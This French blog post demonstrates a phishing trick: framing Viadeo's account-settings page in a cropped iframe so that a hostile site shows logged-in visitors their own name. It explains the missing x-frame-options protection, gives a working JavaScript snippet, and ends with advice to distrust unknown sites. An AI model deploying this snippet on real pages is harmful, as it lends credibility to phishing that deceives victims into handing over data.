{Viadeo} – Lorsqu’une faille de sécurité aide les pirates

 

Salut les Dyrknautes,

 

Point de repos pour les vrais pirates, aujourd'hui j'ai envie de vous proposer de découvrir une nouvelle méthode de phishing ... plutôt simple ... mais surtout très efficace.
Cette technique consiste à récupérer le nom / prénom d'une personne depuis des plateformes connues (Youtube, Twitter, Facebook, etc .... ) pour rendre la page crédible ...
L'idée m'est venue lors du scandale de Cambridge Analytica, durant lequel un "Hacker" avait mis en ligne une fausse page qui vous identifiait grâce à cette technique.

Pour les curieux, vous pouvez accéder à cette page ici : https://inti.io/oilsjtanalytica/ 

 

La technique utilisée

Pour récupérer les informations d'une personne, il suffit de créer sur une page une iframe, pointant vers une page "générique" où sont affichées les informations de la personne.
Le plus souvent, il suffit de prendre la page qui vous sert à paramétrer votre compte.
Par "générique" j'entends que l'iframe doit contenir un lien vers quelques choses du style "/me" et non "/12345"

Cette "iframe" sera stockée dans une "div", ce qui nous permettra par la suite de positionner l'information que nous souhaitons extraire (nom, prénom, date de naissance, sexe, ...).

Voici une petite illustration de la démarche

 

 

Viadeo se sécurise moins que les autres

En effet, aujourd'hui, il est possible de se sécuriser contre ce genre de technique ...

Attention, lorsque je dis "sécuriser", j'entends :
"Une plateforme PEUT se protéger contre les vilains pirates qui tente d'exploiter ses informations" ...

Pour se prémunir contre cela, la plupart des plateformes envoient une information au navigateur dans l'entête de leurs pages, afin que le navigateur interdise l'utilisation des iframes en dehors desdites plateformes.

x-frame-options: sameorigin

L'information ci-dessus, par exemple, est envoyée par Linkedin, pour dire :
"Je ne veux pas que les pages de mon site ne soient affichées dans une iframe sur un autre site que le mien"

Il en existe tout un paquet, en voici une autre qui fait presque la même chose:

content-security-policy: frame-ancestors 'self'

 

Le script qui vous récupère votre nom, prénom sur Viadeo

Comme souvent dans mes explications, j'aime vous fournir un petit bout de script qui illustre par l'exemple "la technique".
Ici, vous pourrez depuis n'importe quel site, récupérer le nom / prénom d'une personne, à condition que ladite personne (vous en l’occurrence) soit connecté sur Viadeo.


function ViadeoExtractPart(top,left){
    var container = document.createElement('div'), div = document.createElement('div'), ifr = document.createElement('iframe');
    div.appendChild(ifr); ifr.src = "https://www.viadeo.com/settings/account/"; 
    div.setAttribute('style','width:100px;height:20px;overflow:hidden;position:relative;z-index:999999');
    ifr.setAttribute('style','width:1000px;height:1000px;position:absolute;top:'+top+'px;left:'+left+'px;');
    container.appendChild(div);
    return container;
	
}


var prenom = ViadeoExtractPart(-390,-400), nom    = ViadeoExtractPart(-420,-400),
	nomPrenom = document.createElement('div');;
nomPrenom.setAttribute('style','position:relative;width:20px;width:200px');
prenom.setAttribute('style','	position:absolute;top:0px;left:0px;');
nom.setAttribute('style','		position:absolute;top:0px;left:100px;');
nomPrenom.appendChild(prenom);
nomPrenom.appendChild(nom);
document.getElementsByTagName('html')[0].appendChild(nomPrenom);

Conclusion

Méfiez vous des sites que vous ne connaissez pas, et qui pourraient vous afficher des informations vous concernant.
Savoir qui vous êtes ne signifie pas que la page soit de confiance.
N'entrez jamais de données confidentielle sur un site que vous ne connaissez pas.

Attention :

Bien que j'évoque une manière d'exploiter la plateforme Viadeo.com pour récupérer les informations d'une personne à son insu, il s'agit là d'une démonstration illustrant une méthode employée par certains pirates, et non d'une incitation à pirater des gens.

Partagez ce contenu

5 comments

Laisser une réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *